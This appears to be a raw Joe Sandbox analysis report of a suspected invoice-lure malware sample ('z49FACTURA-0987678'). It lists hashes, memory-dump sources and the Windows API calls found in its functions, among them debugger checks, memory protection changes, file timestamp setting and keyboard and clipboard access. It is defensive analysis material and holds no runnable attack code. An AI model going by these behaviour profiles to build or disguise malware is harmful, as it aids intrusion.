• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371
• Opcode ID: e3fda4ce9cc9c718ec1a7eb92819fe8e2fe9c9b2ceaa497ba05e93d3a5915714
• Instruction ID: 3bcb7057e8d1523c06517883477d2cc5e44e2f0ba05f4d9f730d768eb727253b
• Opcode Fuzzy Hash: e3fda4ce9cc9c718ec1a7eb92819fe8e2fe9c9b2ceaa497ba05e93d3a5915714
• Instruction Fuzzy Hash: B5D05EB958030DABDB50ABA0DC0EFDA773CE704701F4002F1BB54960A1EAB095999B92
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d77f41ecbb1b574e2d5e720997e894501b07053f27aeda763475cf53badd36df
• Instruction ID: d8e46cb842382c23ddc3347daac6b513f364cfa2269a393c763b207c5052906c
• Opcode Fuzzy Hash: d77f41ecbb1b574e2d5e720997e894501b07053f27aeda763475cf53badd36df
• Instruction Fuzzy Hash: 0CF16E71A083009FC754DF28C880A6ABBE5FF88324F14992EF8999B351D735E945DF92
APIs
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EF0193
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00EF019B
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EF01A6
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EF01B1
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00EF01B9
  • Part of subcall function 00EF0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00EF01C1
  • Part of subcall function 00EE60F9: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00EE6154
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00EDF9CD
• OleInitialize.OLE32(00000000), ref: 00EDFA4A
• CloseHandle.KERNEL32(00000000), ref: 00F145C8
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Virtual$Handle$ClipboardCloseFormatInitializeRegister
• String ID:
• API String ID: 3094916012-0
• Opcode ID: 41fc0c48d41cf0e8db54014807b84946e63299b04f2f3c931200404b8ff0a2d4
• Instruction ID: e08acadd7403fdeade80d8642b3d9882f1bd2e9c4e5e1caa0038f7282c100df5
• Opcode Fuzzy Hash: 41fc0c48d41cf0e8db54014807b84946e63299b04f2f3c931200404b8ff0a2d4
• Instruction Fuzzy Hash: 9581F0B0905A48CFC7C6DF7EA9606197BE6FB88B06750812BD518CB332E7704489EF12
APIs
• _memset.LIBCMT ref: 00ED4370
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00ED4415
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00ED4432
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
• API String ID: 1505330794-0
• Opcode ID: b63ddb0cab6231b59a6e170e981e777e0957058b6e602941e47042764b702491
• Instruction ID: f6aaf6c13f55c623ebbe43e2aa62441f622fc4bef2acf958e4390969d66e33e9
• Opcode Fuzzy Hash: b63ddb0cab6231b59a6e170e981e777e0957058b6e602941e47042764b702491
• Instruction Fuzzy Hash: E131BFB05047018FC721EF24D88469BBBF8FB58708F00092FE69A96391E770A945DB92
APIs
• __FF_MSGBANNER.LIBCMT ref: 00EF5733
  • Part of subcall function 00EFA16B: __NMSG_WRITE.LIBCMT ref: 00EFA192
  • Part of subcall function 00EFA16B: __NMSG_WRITE.LIBCMT ref: 00EFA19C
• __NMSG_WRITE.LIBCMT ref: 00EF573A
  • Part of subcall function 00EFA1C8: GetModuleFileNameW.KERNEL32(00000000,00F933BA,00000104,00000000,00000001,00000000), ref: 00EFA25A
  • Part of subcall function 00EFA1C8: ___crtMessageBoxW.LIBCMT ref: 00EFA308
  • Part of subcall function 00EF309F: ___crtCorExitProcess.LIBCMT ref: 00EF30A5
  • Part of subcall function 00EF309F: ExitProcess.KERNEL32 ref: 00EF30AE
  • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
• RtlAllocateHeap.NTDLL(01130000,00000000,00000001), ref: 00EF575F
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
• API String ID: 1372826849-0
• Opcode ID: d1f1c14eb3d1d41fe9340adafb32f4d212a8c6b4f2de24ae2d9d2c0cc57aa4f2
• Instruction ID: 695cddb7472ea1c0bc0e18efda0584585a1dd643b45b91ba351dbeb5bd70e09a
• Opcode Fuzzy Hash: d1f1c14eb3d1d41fe9340adafb32f4d212a8c6b4f2de24ae2d9d2c0cc57aa4f2
• Instruction Fuzzy Hash: 3F01D276301B0DDAD6153734EC42A7E73888B62366F112427F719BB1C2DE7099005660
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F39548,?,?,?,?,?,00000004), ref: 00F398BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F39548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F398D1
• CloseHandle.KERNEL32(00000000,?,00F39548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F398D8
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• API String ID: 3397143404-0
• Opcode ID: 60698224a4db88f92cab26f8bb60b7a920d3f8a1602e34a4299b41bf0e9d65a7
• Instruction ID: 20379ac0a52250a3045cb75d7c0508f3bcca5c5cec0bd86167907ad0b6f9b0ec
• Opcode Fuzzy Hash: 60698224a4db88f92cab26f8bb60b7a920d3f8a1602e34a4299b41bf0e9d65a7
• Instruction Fuzzy Hash: 7DE08632141718B7E7212B54EC09FCA7B19AB06771F104120FB14A90E087B11515A7D8
APIs
• _free.LIBCMT ref: 00F38D1B
  • Part of subcall function 00EF2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EF9A24), ref: 00EF2D69
  • Part of subcall function 00EF2D55: GetLastError.KERNEL32(00000000,?,00EF9A24), ref: 00EF2D7B
• _free.LIBCMT ref: 00F38D2C
• _free.LIBCMT ref: 00F38D3E
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
• Instruction ID: 90e8abbe168ee9191aecbef0f468b5a669aae7b0f8c84f2701fa4caeae6f65d6
• Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
• Instruction Fuzzy Hash: 64E012A1A0170946CB24A578A941AA353DC4F583B2B14191DB60DE7186CF68F8439124
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID:
• String ID: CALL
• API String ID: 0-4196123274
• Opcode ID: 03d386865a7e23253eea158364d7e40406e7254329a5a309a7ee9aa194cf83ab
• Instruction ID: 528b7e2af66eea44686a543234b8ed379ec55ad08094dfb1421d89c83ad5eff6
• Opcode Fuzzy Hash: 03d386865a7e23253eea158364d7e40406e7254329a5a309a7ee9aa194cf83ab
• Instruction Fuzzy Hash: DC225A70508301DFCB24DF14C450A6AB7E1FF84314F19996EE88AAB362D735ED86DB82
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: _memmove
• String ID: EA06
• API String ID: 4104443479-3962188686
• Opcode ID: c553c81bec5b643970bc3e0bfc142b6c35b5a562237a6a743766192995314fba
• Instruction ID: d2892cead58faf0a36faa85cee668e8680c8e97be74bd086cff7043d44097cb7
• Opcode Fuzzy Hash: c553c81bec5b643970bc3e0bfc142b6c35b5a562237a6a743766192995314fba
• Instruction Fuzzy Hash: D3415CA1A0415C6BDF219B548891BFE7FE3DB65300F286477EC82BB3C2D6319D4693A1
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            APIs
                                                                            • 74D2C8D0.UXTHEME ref: 00ED4834
                                                                              • Part of subcall function 00EF336C: __lock.LIBCMT ref: 00EF3372
                                                                              • Part of subcall function 00EF336C: RtlDecodePointer.NTDLL(00000001), ref: 00EF337E
                                                                              • Part of subcall function 00EF336C: RtlEncodePointer.NTDLL(?), ref: 00EF3389
                                                                              • Part of subcall function 00ED48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00ED4915
                                                                              • Part of subcall function 00ED48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00ED492A
                                                                              • Part of subcall function 00ED3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00ED3B68
                                                                              • Part of subcall function 00ED3B3A: IsDebuggerPresent.KERNEL32 ref: 00ED3B7A
                                                                              • Part of subcall function 00ED3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F952F8,00F952E0,?,?), ref: 00ED3BEB
                                                                              • Part of subcall function 00ED3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00ED3C6F
                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00ED4874
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                                                            • String ID:
                                                                            • API String ID: 2688871447-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __lock_file_memset
                                                                            • String ID:
                                                                            • API String ID: 26237723-0
                                                                            APIs
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            • __lock_file.LIBCMT ref: 00EF53EB
                                                                              • Part of subcall function 00EF6C11: __lock.LIBCMT ref: 00EF6C34
                                                                            • __fclose_nolock.LIBCMT ref: 00EF53F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2800547568-0
                                                                            APIs
                                                                              • Part of subcall function 0116D708: GetFileAttributesW.KERNELBASE(?), ref: 0116D713
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0116DFFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesCreateDirectoryFile
                                                                            • String ID:
                                                                            • API String ID: 3401506121-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 544645111-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID:
                                                                            • API String ID: 4104443479-0
                                                                            APIs
                                                                              • Part of subcall function 00ED4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00ED4BEF
                                                                              • Part of subcall function 00EF525B: __wfsopen.LIBCMT ref: 00EF5266
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E0F
                                                                              • Part of subcall function 00ED4B6A: FreeLibrary.KERNEL32(00000000), ref: 00ED4BA4
                                                                              • Part of subcall function 00ED4C70: _memmove.LIBCMT ref: 00ED4CBA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Free$Load__wfsopen_memmove
                                                                            • String ID:
                                                                            • API String ID: 1396898556-0
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ClearVariant
                                                                            • String ID:
                                                                            • API String ID: 1473721057-0
                                                                            APIs
                                                                            • __lock_file.LIBCMT ref: 00EF48A6
                                                                              • Part of subcall function 00EF8B28: __getptd_noexit.LIBCMT ref: 00EF8B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit__lock_file
                                                                            • String ID:
                                                                            • API String ID: 2597487223-0
                                                                            • Opcode ID: 2e6e3f2659f0f10772274927403d83e106291718867e9c565c989a737121010b
                                                                            • Instruction ID: 46d53f0ba31b10b0020442a4ac58c09dbd2c93f8d58f6555dac9ff095e89c0f4
                                                                            • Opcode Fuzzy Hash: 2e6e3f2659f0f10772274927403d83e106291718867e9c565c989a737121010b
                                                                            • Instruction Fuzzy Hash: 6AF0FFB190028CABDF15AFB48C063FF36E0AF00364F04A404B624BA1C1DBB88950DB41
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(?,?,00F952F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00ED4E7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary
                                                                            • String ID:
                                                                            • API String ID: 3664257935-0
                                                                            • Opcode ID: 18e72594355c58fc4ee6683f0a9fae7badf92ff5cf8cc49f86191635ff95ccf7
                                                                            • Instruction ID: cce5f0f8db13face106f6f52ab19b4c2f994a2c1dfc85f673f416405f60b438e
                                                                            • Opcode Fuzzy Hash: 18e72594355c58fc4ee6683f0a9fae7badf92ff5cf8cc49f86191635ff95ccf7
                                                                            • Instruction Fuzzy Hash: 9DF01CB1501711DFCB349F64D494852B7E1FF24329310997EE6D696750C7319845DB40
                                                                            APIs
                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00EF07B0
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongNamePath_memmove
                                                                            • String ID:
                                                                            • API String ID: 2514874351-0
                                                                            • Opcode ID: ea27893251ea094b39920d0fef037dcedfc40d9c4763ca3e6e9229f7f2127c23
                                                                            • Instruction ID: eb3f41d446ea564d2d7925a7373243ce08fd7804b66e173efae9175a00e409a0
                                                                            • Opcode Fuzzy Hash: ea27893251ea094b39920d0fef037dcedfc40d9c4763ca3e6e9229f7f2127c23
                                                                            • Instruction Fuzzy Hash: 8EE0867690422857C720A6689C05FEA77DDDB887A1F0441B6FD0CD7244D9659C909690
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction ID: 5b17c6ff49197f378dc21ad33780d82e8ae16eb6d5a58c172173447f9af6daa6
                                                                            • Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
                                                                            • Instruction Fuzzy Hash: E6E092B1504B045FD7398A24D800BA373E1AB05325F00085DF6AA93241EB6278869759
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0116D713
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction ID: 276c1abe0cb2388d97c5aee847ace9a77d068c7967d9788b491de8e8512c1474
                                                                            • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                            • Instruction Fuzzy Hash: B8E08630605548DBDF1CCAE8A9056A973ACA708314F014654E545C3180DA368920D652
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?), ref: 0116D6E3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction ID: 4fa0d691991e78fe6784ecf864df1bb449387833d53928dcacd32c7ef9920866
                                                                            • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                                                            • Instruction Fuzzy Hash: C1D05E70A0620CABCB14CEECA90899977ACA705360F404794E91983280D6329D109751
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wfsopen
                                                                            • String ID:
                                                                            • API String ID: 197181222-0
                                                                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction ID: 9b28019e21cc881e5070377bfa499a8c979ff45a1c17a9c5ad721b55429ebafd
                                                                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                            • Instruction Fuzzy Hash: E9B0927644020C77DE012A82FC02A593F699B51764F808020FB0C28172A673A6649A89
                                                                            APIs
                                                                            • Sleep.KERNELBASE(000001F4), ref: 0116F109
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1299273104.000000000116C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0116C000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_116c000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction ID: 8c026bd4cc022c4cf758de87feb3cd6ef1fe8ad6fb0adf9a0c24e5f39b66bf6d
                                                                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                            • Instruction Fuzzy Hash: 17E0BF7494010EDFDB00DFA4D54969D7BB4EF04301F104161FD0192281D73199608A62
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F5CB37
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5CB95
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5CBD6
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5CC00
                                                                            • SendMessageW.USER32 ref: 00F5CC29
                                                                            • _wcsncpy.LIBCMT ref: 00F5CC95
                                                                            • GetKeyState.USER32(00000011), ref: 00F5CCB6
                                                                            • GetKeyState.USER32(00000009), ref: 00F5CCC3
                                                                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F5CCD9
                                                                            • GetKeyState.USER32(00000010), ref: 00F5CCE3
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F5CD0C
                                                                            • SendMessageW.USER32 ref: 00F5CD33
                                                                            • SendMessageW.USER32(?,00001030,?,00F5B348), ref: 00F5CE37
                                                                            • SetCapture.USER32(?), ref: 00F5CE69
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5CECE
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F5CEF5
                                                                            • ReleaseCapture.USER32 ref: 00F5CF00
                                                                            • GetCursorPos.USER32(?), ref: 00F5CF3A
